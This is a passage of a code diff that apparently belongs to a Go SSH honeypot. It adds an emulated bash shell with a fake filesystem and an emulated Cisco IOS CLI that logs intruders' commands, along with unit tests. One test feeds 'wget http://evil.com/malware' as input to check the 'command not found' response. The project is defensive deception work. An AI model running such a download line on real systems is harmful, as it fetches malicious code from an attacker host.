if !strings.Contains(r.output, "passwd") {
|
||||||
|
t.Errorf("ls /etc = %q, should contain 'passwd'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdLsNonexistent(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "ls /nope")
|
||||||
|
if !strings.Contains(r.output, "No such file") {
|
||||||
|
t.Errorf("ls /nope = %q, should contain 'No such file'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCd(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cd /tmp")
|
||||||
|
if r.output != "" {
|
||||||
|
t.Errorf("cd /tmp should produce no output, got %q", r.output)
|
||||||
|
}
|
||||||
|
if state.cwd != "/tmp" {
|
||||||
|
t.Errorf("cwd = %q, want %q", state.cwd, "/tmp")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCdNonexistent(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cd /nope")
|
||||||
|
if !strings.Contains(r.output, "No such file") {
|
||||||
|
t.Errorf("cd /nope = %q, should contain 'No such file'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCdNoArgs(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
state.cwd = "/tmp"
|
||||||
|
dispatch(state, "cd")
|
||||||
|
if state.cwd != "/root" {
|
||||||
|
t.Errorf("cd with no args should go to /root, got %q", state.cwd)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCdRelative(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
state.cwd = "/var"
|
||||||
|
dispatch(state, "cd log")
|
||||||
|
if state.cwd != "/var/log" {
|
||||||
|
t.Errorf("cwd = %q, want %q", state.cwd, "/var/log")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCdDotDot(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
state.cwd = "/var/log"
|
||||||
|
dispatch(state, "cd ..")
|
||||||
|
if state.cwd != "/var" {
|
||||||
|
t.Errorf("cwd = %q, want %q", state.cwd, "/var")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCat(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cat /etc/hostname")
|
||||||
|
if !strings.Contains(r.output, "testhost") {
|
||||||
|
t.Errorf("cat /etc/hostname = %q, should contain 'testhost'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCatNonexistent(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cat /nope")
|
||||||
|
if !strings.Contains(r.output, "No such file") {
|
||||||
|
t.Errorf("cat /nope = %q, should contain 'No such file'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCatDirectory(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cat /etc")
|
||||||
|
if !strings.Contains(r.output, "Is a directory") {
|
||||||
|
t.Errorf("cat /etc = %q, should contain 'Is a directory'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdCatMultiple(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "cat /etc/hostname /root/README.txt")
|
||||||
|
if !strings.Contains(r.output, "testhost") || !strings.Contains(r.output, "DO NOT MODIFY") {
|
||||||
|
t.Errorf("cat multiple files = %q, should contain both file contents", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdExit(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "exit")
|
||||||
|
if !r.exit {
|
||||||
|
t.Error("exit should set exit=true")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdLogout(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "logout")
|
||||||
|
if !r.exit {
|
||||||
|
t.Error("logout should set exit=true")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdNotFound(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "wget http://evil.com/malware")
|
||||||
|
if !strings.Contains(r.output, "command not found") {
|
||||||
|
t.Errorf("unknown cmd = %q, should contain 'command not found'", r.output)
|
||||||
|
}
|
||||||
|
if !strings.HasPrefix(r.output, "wget:") {
|
||||||
|
t.Errorf("unknown cmd = %q, should start with 'wget:'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdEmptyLine(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "")
|
||||||
|
if r.output != "" || r.exit {
|
||||||
|
t.Errorf("empty line should produce no output and not exit")
|
||||||
|
}
|
||||||
|
}
|
||||||
166
internal/shell/bash/filesystem.go
Normal file
166
internal/shell/bash/filesystem.go
Normal file
@@ -0,0 +1,166 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"path"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
type fsNode struct {
|
||||||
|
name string
|
||||||
|
isDir bool
|
||||||
|
content string
|
||||||
|
children map[string]*fsNode
|
||||||
|
}
|
||||||
|
|
||||||
|
type filesystem struct {
|
||||||
|
root *fsNode
|
||||||
|
}
|
||||||
|
|
||||||
|
func newFilesystem(hostname string) *filesystem {
|
||||||
|
fs := &filesystem{
|
||||||
|
root: &fsNode{name: "/", isDir: true, children: make(map[string]*fsNode)},
|
||||||
|
}
|
||||||
|
|
||||||
|
fs.mkdirAll("/etc")
|
||||||
|
fs.mkdirAll("/root")
|
||||||
|
fs.mkdirAll("/home")
|
||||||
|
fs.mkdirAll("/var/log")
|
||||||
|
fs.mkdirAll("/tmp")
|
||||||
|
fs.mkdirAll("/usr/bin")
|
||||||
|
fs.mkdirAll("/usr/local")
|
||||||
|
|
||||||
|
fs.writeFile("/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n"+
|
||||||
|
"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"+
|
||||||
|
"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"+
|
||||||
|
"mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false\n")
|
||||||
|
|
||||||
|
fs.writeFile("/etc/hostname", hostname+"\n")
|
||||||
|
|
||||||
|
fs.writeFile("/etc/hosts", "127.0.0.1\tlocalhost\n"+
|
||||||
|
"127.0.1.1\t"+hostname+"\n"+
|
||||||
|
"::1\t\tlocalhost ip6-localhost ip6-loopback\n")
|
||||||
|
|
||||||
|
fs.writeFile("/root/.bash_history",
|
||||||
|
"apt update\n"+
|
||||||
|
"apt upgrade -y\n"+
|
||||||
|
"systemctl restart nginx\n"+
|
||||||
|
"tail -f /var/log/syslog\n"+
|
||||||
|
"df -h\n"+
|
||||||
|
"free -m\n"+
|
||||||
|
"netstat -tlnp\n"+
|
||||||
|
"cat /etc/passwd\n")
|
||||||
|
|
||||||
|
fs.writeFile("/root/.bashrc",
|
||||||
|
"# ~/.bashrc: executed by bash(1) for non-login shells.\n"+
|
||||||
|
"export PS1='\\u@\\h:\\w\\$ '\n"+
|
||||||
|
"alias ll='ls -alF'\n"+
|
||||||
|
"alias la='ls -A'\n")
|
||||||
|
|
||||||
|
fs.writeFile("/root/README.txt", "Production server - DO NOT MODIFY\n")
|
||||||
|
|
||||||
|
fs.writeFile("/var/log/syslog",
|
||||||
|
"Jan 12 03:14:22 "+hostname+" systemd[1]: Started Daily apt download activities.\n"+
|
||||||
|
"Jan 12 03:14:23 "+hostname+" systemd[1]: Started Daily Cleanup of Temporary Directories.\n"+
|
||||||
|
"Jan 12 04:00:01 "+hostname+" CRON[12345]: (root) CMD (/usr/local/bin/backup.sh)\n"+
|
||||||
|
"Jan 12 04:00:03 "+hostname+" kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.42 DST=10.0.0.5 PROTO=TCP DPT=22\n")
|
||||||
|
|
||||||
|
fs.writeFile("/tmp/notes.txt", "TODO: Update SSL certificates\n")
|
||||||
|
|
||||||
|
return fs
|
||||||
|
}
|
||||||
|
|
||||||
|
// resolvePath converts a potentially relative path to an absolute one.
|
||||||
|
func resolvePath(cwd, p string) string {
|
||||||
|
if !strings.HasPrefix(p, "/") {
|
||||||
|
p = cwd + "/" + p
|
||||||
|
}
|
||||||
|
return path.Clean(p)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) lookup(p string) *fsNode {
|
||||||
|
p = path.Clean(p)
|
||||||
|
if p == "/" {
|
||||||
|
return fs.root
|
||||||
|
}
|
||||||
|
|
||||||
|
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
|
||||||
|
node := fs.root
|
||||||
|
for _, part := range parts {
|
||||||
|
if node.children == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
child, ok := node.children[part]
|
||||||
|
if !ok {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
node = child
|
||||||
|
}
|
||||||
|
return node
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) exists(p string) bool {
|
||||||
|
return fs.lookup(p) != nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) isDirectory(p string) bool {
|
||||||
|
n := fs.lookup(p)
|
||||||
|
return n != nil && n.isDir
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) list(p string) ([]string, error) {
|
||||||
|
n := fs.lookup(p)
|
||||||
|
if n == nil {
|
||||||
|
return nil, fmt.Errorf("ls: cannot access '%s': No such file or directory", p)
|
||||||
|
}
|
||||||
|
if !n.isDir {
|
||||||
|
return nil, fmt.Errorf("ls: cannot access '%s': Not a directory", p)
|
||||||
|
}
|
||||||
|
|
||||||
|
names := make([]string, 0, len(n.children))
|
||||||
|
for name, child := range n.children {
|
||||||
|
if child.isDir {
|
||||||
|
name += "/"
|
||||||
|
}
|
||||||
|
names = append(names, name)
|
||||||
|
}
|
||||||
|
return names, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) read(p string) (string, error) {
|
||||||
|
n := fs.lookup(p)
|
||||||
|
if n == nil {
|
||||||
|
return "", fmt.Errorf("cat: %s: No such file or directory", p)
|
||||||
|
}
|
||||||
|
if n.isDir {
|
||||||
|
return "", fmt.Errorf("cat: %s: Is a directory", p)
|
||||||
|
}
|
||||||
|
return n.content, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) mkdirAll(p string) {
|
||||||
|
p = path.Clean(p)
|
||||||
|
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
|
||||||
|
node := fs.root
|
||||||
|
for _, part := range parts {
|
||||||
|
if node.children == nil {
|
||||||
|
node.children = make(map[string]*fsNode)
|
||||||
|
}
|
||||||
|
child, ok := node.children[part]
|
||||||
|
if !ok {
|
||||||
|
child = &fsNode{name: part, isDir: true, children: make(map[string]*fsNode)}
|
||||||
|
node.children[part] = child
|
||||||
|
}
|
||||||
|
node = child
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (fs *filesystem) writeFile(p string, content string) {
|
||||||
|
p = path.Clean(p)
|
||||||
|
dir := path.Dir(p)
|
||||||
|
base := path.Base(p)
|
||||||
|
|
||||||
|
fs.mkdirAll(dir)
|
||||||
|
parent := fs.lookup(dir)
|
||||||
|
parent.children[base] = &fsNode{name: base, content: content}
|
||||||
|
}
|
||||||
140
internal/shell/bash/filesystem_test.go
Normal file
140
internal/shell/bash/filesystem_test.go
Normal file
@@ -0,0 +1,140 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"sort"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestNewFilesystem(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
|
||||||
|
// Standard directories should exist.
|
||||||
|
for _, dir := range []string{"/etc", "/root", "/home", "/var/log", "/tmp", "/usr/bin"} {
|
||||||
|
if !fs.isDirectory(dir) {
|
||||||
|
t.Errorf("%s should be a directory", dir)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Standard files should exist.
|
||||||
|
for _, file := range []string{"/etc/passwd", "/etc/hostname", "/root/.bashrc", "/tmp/notes.txt"} {
|
||||||
|
if !fs.exists(file) {
|
||||||
|
t.Errorf("%s should exist", file)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemHostname(t *testing.T) {
|
||||||
|
fs := newFilesystem("myhost")
|
||||||
|
content, err := fs.read("/etc/hostname")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read /etc/hostname: %v", err)
|
||||||
|
}
|
||||||
|
if content != "myhost\n" {
|
||||||
|
t.Errorf("hostname content = %q, want %q", content, "myhost\n")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolvePath(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
cwd string
|
||||||
|
arg string
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{"/root", "file.txt", "/root/file.txt"},
|
||||||
|
{"/root", "/etc/passwd", "/etc/passwd"},
|
||||||
|
{"/root", "..", "/"},
|
||||||
|
{"/var/log", "../..", "/"},
|
||||||
|
{"/root", ".", "/root"},
|
||||||
|
{"/root", "./sub/file", "/root/sub/file"},
|
||||||
|
{"/", "etc", "/etc"},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
got := resolvePath(tt.cwd, tt.arg)
|
||||||
|
if got != tt.want {
|
||||||
|
t.Errorf("resolvePath(%q, %q) = %q, want %q", tt.cwd, tt.arg, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemList(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
|
||||||
|
names, err := fs.list("/etc")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("list /etc: %v", err)
|
||||||
|
}
|
||||||
|
sort.Strings(names)
|
||||||
|
|
||||||
|
// Should contain at least passwd, hostname, hosts.
|
||||||
|
found := map[string]bool{}
|
||||||
|
for _, n := range names {
|
||||||
|
found[n] = true
|
||||||
|
}
|
||||||
|
for _, want := range []string{"passwd", "hostname", "hosts"} {
|
||||||
|
if !found[want] {
|
||||||
|
t.Errorf("list /etc missing %q, got %v", want, names)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemListNonexistent(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
_, err := fs.list("/nonexistent")
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error listing nonexistent directory")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemListFile(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
_, err := fs.list("/etc/passwd")
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error listing a file")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemRead(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
content, err := fs.read("/etc/passwd")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read: %v", err)
|
||||||
|
}
|
||||||
|
if content == "" {
|
||||||
|
t.Error("expected non-empty content")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemReadNonexistent(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
_, err := fs.read("/no/such/file")
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for nonexistent file")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemReadDirectory(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
_, err := fs.read("/etc")
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for reading a directory")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFilesystemDirectoryListing(t *testing.T) {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
names, err := fs.list("/")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("list /: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Root directories should end with /
|
||||||
|
found := map[string]bool{}
|
||||||
|
for _, n := range names {
|
||||||
|
found[n] = true
|
||||||
|
}
|
||||||
|
for _, want := range []string{"etc/", "root/", "home/", "var/", "tmp/", "usr/"} {
|
||||||
|
if !found[want] {
|
||||||
|
t.Errorf("list / missing %q, got %v", want, names)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
206
internal/shell/cisco/cisco.go
Normal file
206
internal/shell/cisco/cisco.go
Normal file
@@ -0,0 +1,206 @@
|
|||||||
|
package cisco
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 5 * time.Minute
|
||||||
|
|
||||||
|
// CiscoShell emulates a Cisco IOS CLI.
|
||||||
|
type CiscoShell struct{}
|
||||||
|
|
||||||
|
// NewCiscoShell returns a new CiscoShell instance.
|
||||||
|
func NewCiscoShell() *CiscoShell {
|
||||||
|
return &CiscoShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (c *CiscoShell) Name() string { return "cisco" }
|
||||||
|
func (c *CiscoShell) Description() string { return "Cisco IOS CLI emulator" }
|
||||||
|
|
||||||
|
func (c *CiscoShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
hostname := configString(sess.ShellConfig, "hostname", "Router")
|
||||||
|
model := configString(sess.ShellConfig, "model", "C2960")
|
||||||
|
iosVersion := configString(sess.ShellConfig, "ios_version", "15.0(2)SE11")
|
||||||
|
enablePass := configString(sess.ShellConfig, "enable_password", "")
|
||||||
|
|
||||||
|
state := newIOSState(hostname, model, iosVersion, enablePass)
|
||||||
|
|
||||||
|
// IOS just shows a blank line then the prompt after SSH auth.
|
||||||
|
fmt.Fprint(rw, "\r\n")
|
||||||
|
|
||||||
|
for {
|
||||||
|
prompt := state.prompt()
|
||||||
|
if _, err := fmt.Fprint(rw, prompt); err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if errors.Is(err, io.EOF) {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
trimmed := strings.TrimSpace(line)
|
||||||
|
if trimmed == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for Ctrl+Z (^Z) — return to privileged exec.
|
||||||
|
if trimmed == "\x1a" || trimmed == "^Z" {
|
||||||
|
if state.mode == modeGlobalConfig || state.mode == modeInterfaceConfig {
|
||||||
|
state.mode = modePrivilegedExec
|
||||||
|
state.currentIf = ""
|
||||||
|
}
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Handle "enable" specially — it needs password prompting.
|
||||||
|
if state.mode == modeUserExec && isEnableCommand(trimmed) {
|
||||||
|
output := handleEnable(ctx, state, rw)
|
||||||
|
if sess.Store != nil {
|
||||||
|
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
|
||||||
|
return fmt.Errorf("append session log: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("cisco")
|
||||||
|
}
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
result := state.dispatch(trimmed)
|
||||||
|
|
||||||
|
var output string
|
||||||
|
if result.output != "" {
|
||||||
|
output = result.output
|
||||||
|
output = strings.ReplaceAll(output, "\r\n", "\n")
|
||||||
|
output = strings.ReplaceAll(output, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
if sess.Store != nil {
|
||||||
|
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
|
||||||
|
return fmt.Errorf("append session log: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("cisco")
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.exit {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// isEnableCommand checks if input resolves to "enable" in user exec mode.
|
||||||
|
func isEnableCommand(input string) bool {
|
||||||
|
words := strings.Fields(input)
|
||||||
|
if len(words) != 1 {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
w := strings.ToLower(words[0])
|
||||||
|
enable := "enable"
|
||||||
|
return len(w) >= 2 && len(w) <= len(enable) && enable[:len(w)] == w
|
||||||
|
}
|
||||||
|
|
||||||
|
// handleEnable manages the enable password prompt flow.
|
||||||
|
// Returns the output string (for logging).
|
||||||
|
func handleEnable(ctx context.Context, state *iosState, rw io.ReadWriter) string {
|
||||||
|
const maxAttempts = 3
|
||||||
|
hadFailure := false
|
||||||
|
|
||||||
|
for range maxAttempts {
|
||||||
|
fmt.Fprint(rw, "Password: ")
|
||||||
|
password, err := readPassword(ctx, rw)
|
||||||
|
if err != nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
fmt.Fprint(rw, "\r\n")
|
||||||
|
|
||||||
|
if state.enablePass == "" {
|
||||||
|
// No password configured — accept after one failed attempt.
|
||||||
|
if hadFailure {
|
||||||
|
state.mode = modePrivilegedExec
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
hadFailure = true
|
||||||
|
} else if password == state.enablePass {
|
||||||
|
state.mode = modePrivilegedExec
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
output := "% Bad passwords"
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
return output
|
||||||
|
}
|
||||||
|
|
||||||
|
// readPassword reads a password without echoing characters.
|
||||||
|
func readPassword(ctx context.Context, rw io.ReadWriter) (string, error) {
|
||||||
|
var buf []byte
|
||||||
|
b := make([]byte, 1)
|
||||||
|
|
||||||
|
for {
|
||||||
|
select {
|
||||||
|
case <-ctx.Done():
|
||||||
|
return "", ctx.Err()
|
||||||
|
default:
|
||||||
|
}
|
||||||
|
|
||||||
|
n, err := rw.Read(b)
|
||||||
|
if err != nil {
|
||||||
|
return "", err
|
||||||
|
}
|
||||||
|
if n == 0 {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
ch := b[0]
|
||||||
|
switch {
|
||||||
|
case ch == '\r' || ch == '\n':
|
||||||
|
return string(buf), nil
|
||||||
|
case ch == 4: // Ctrl+D
|
||||||
|
return string(buf), io.EOF
|
||||||
|
case ch == 3: // Ctrl+C
|
||||||
|
return "", io.EOF
|
||||||
|
case ch == 127 || ch == 8: // Backspace/DEL
|
||||||
|
if len(buf) > 0 {
|
||||||
|
buf = buf[:len(buf)-1]
|
||||||
|
}
|
||||||
|
case ch == 27: // ESC sequence
|
||||||
|
next := make([]byte, 1)
|
||||||
|
if n, _ := rw.Read(next); n > 0 && next[0] == '[' {
|
||||||
|
rw.Read(next)
|
||||||
|
}
|
||||||
|
case ch >= 32 && ch < 127:
|
||||||
|
buf = append(buf, ch)
|
||||||
|
// Don't echo.
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// configString reads a string from the shell config map with a default.
|
||||||
|
func configString(cfg map[string]any, key, defaultVal string) string {
|
||||||
|
if cfg == nil {
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
|
if v, ok := cfg[key]; ok {
|
||||||
|
if s, ok := v.(string); ok && s != "" {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
531
internal/shell/cisco/cisco_test.go
Normal file
531
internal/shell/cisco/cisco_test.go
Normal file
@@ -0,0 +1,531 @@
|
|||||||
|
package cisco
|
||||||
|
|
||||||
|
import (
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
// --- Abbreviation resolution tests ---
|
||||||
|
|
||||||
|
func TestResolveAbbreviationExact(t *testing.T) {
|
||||||
|
entries := []commandEntry{
|
||||||
|
{name: "show"},
|
||||||
|
{name: "shutdown"},
|
||||||
|
}
|
||||||
|
got, err := resolveAbbreviation("show", entries)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if got != "show" {
|
||||||
|
t.Errorf("got %q, want %q", got, "show")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveAbbreviationUnique(t *testing.T) {
|
||||||
|
entries := []commandEntry{
|
||||||
|
{name: "show"},
|
||||||
|
{name: "enable"},
|
||||||
|
{name: "exit"},
|
||||||
|
}
|
||||||
|
got, err := resolveAbbreviation("sh", entries)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if got != "show" {
|
||||||
|
t.Errorf("got %q, want %q", got, "show")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveAbbreviationAmbiguous(t *testing.T) {
|
||||||
|
entries := []commandEntry{
|
||||||
|
{name: "show"},
|
||||||
|
{name: "shutdown"},
|
||||||
|
}
|
||||||
|
_, err := resolveAbbreviation("sh", entries)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected ambiguous error, got nil")
|
||||||
|
}
|
||||||
|
if err.Error() != "ambiguous" {
|
||||||
|
t.Errorf("got error %q, want %q", err.Error(), "ambiguous")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveAbbreviationUnknown(t *testing.T) {
|
||||||
|
entries := []commandEntry{
|
||||||
|
{name: "show"},
|
||||||
|
{name: "enable"},
|
||||||
|
}
|
||||||
|
_, err := resolveAbbreviation("xyz", entries)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected unknown error, got nil")
|
||||||
|
}
|
||||||
|
if err.Error() != "unknown" {
|
||||||
|
t.Errorf("got error %q, want %q", err.Error(), "unknown")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveAbbreviationCaseInsensitive(t *testing.T) {
|
||||||
|
entries := []commandEntry{
|
||||||
|
{name: "show"},
|
||||||
|
{name: "enable"},
|
||||||
|
}
|
||||||
|
got, err := resolveAbbreviation("SH", entries)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if got != "show" {
|
||||||
|
t.Errorf("got %q, want %q", got, "show")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Multi-word command resolution tests ---
|
||||||
|
|
||||||
|
func TestResolveCommandShowRunningConfig(t *testing.T) {
|
||||||
|
resolved, args, err := resolveCommand([]string{"sh", "run"}, privilegedExecCommands)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if len(args) != 0 {
|
||||||
|
t.Errorf("unexpected args: %v", args)
|
||||||
|
}
|
||||||
|
want := []string{"show", "running-config"}
|
||||||
|
if len(resolved) != len(want) {
|
||||||
|
t.Fatalf("resolved = %v, want %v", resolved, want)
|
||||||
|
}
|
||||||
|
for i := range want {
|
||||||
|
if resolved[i] != want[i] {
|
||||||
|
t.Errorf("resolved[%d] = %q, want %q", i, resolved[i], want[i])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveCommandConfigureTerminal(t *testing.T) {
|
||||||
|
resolved, _, err := resolveCommand([]string{"conf", "t"}, privilegedExecCommands)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
want := []string{"configure", "terminal"}
|
||||||
|
if len(resolved) != len(want) {
|
||||||
|
t.Fatalf("resolved = %v, want %v", resolved, want)
|
||||||
|
}
|
||||||
|
for i := range want {
|
||||||
|
if resolved[i] != want[i] {
|
||||||
|
t.Errorf("resolved[%d] = %q, want %q", i, resolved[i], want[i])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveCommandShowIPInterfaceBrief(t *testing.T) {
|
||||||
|
resolved, _, err := resolveCommand([]string{"sh", "ip", "int", "br"}, privilegedExecCommands)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
want := []string{"show", "ip", "interface", "brief"}
|
||||||
|
if len(resolved) != len(want) {
|
||||||
|
t.Fatalf("resolved = %v, want %v", resolved, want)
|
||||||
|
}
|
||||||
|
for i := range want {
|
||||||
|
if resolved[i] != want[i] {
|
||||||
|
t.Errorf("resolved[%d] = %q, want %q", i, resolved[i], want[i])
|
||||||
|
